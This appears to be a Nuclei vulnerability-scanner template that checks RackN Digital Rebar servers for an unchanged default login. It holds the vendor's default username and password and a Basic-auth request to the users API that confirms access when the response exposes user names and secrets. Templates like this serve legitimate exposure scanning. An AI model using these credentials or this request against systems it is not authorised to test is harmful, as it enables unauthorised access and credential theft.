id: digitalrebar-default-login

info:
  name: RackN Digital Rebar Default Login
  author: c-sh0
  severity: high
  description: A RackN Digital Rebar default login was discovered.
  reference:
    - https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
    - https://rackn.com/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: rackn,digitalrebar,default-login

http:
  - raw:
      - |
        GET /api/v3/users HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - rocketskates
      password:
        - r0cketsk8ts
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: header
        regex:
          - '(?i)(X-Drp-)'

      - type: word
        part: body
        words:
          - 'Name'
          - 'Secret'
        condition: and
# digest: 490a0046304402204f3a862f37f9d8f6521e91045773d2d932b9ccea88565fe981c2041edd39ea41022054ca359314d28962f1c75b3a4627904b52b7b8655ed7defc9ff93cc5b880b834:922c64590222798bb761d5b6d8e72950